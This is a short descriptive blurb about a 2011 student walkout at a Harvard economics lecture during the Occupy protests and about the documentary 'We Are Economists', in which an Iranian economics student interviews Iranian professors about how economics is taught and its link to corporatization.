He has been a professor of economics at Harvard University for more than a quarter-century. In 2011, when the first Occupy protests took place or were ongoing in the world and nearly all across the United States, a group of his students staged a walkout at one of his lectures, protesting the corporatization of higher education as part of the global Occupy movement. His students had said that the course contributes to and symbolizes the increasing economic inequality in America. “We Are Economists” is a documentary in which an Iranian economy student decides to take a look at the principles and methods used by professors to teach economy and the link between their methods and corporatization. He conducts interviews with several Iranian professors of economics to shed light on the issue.
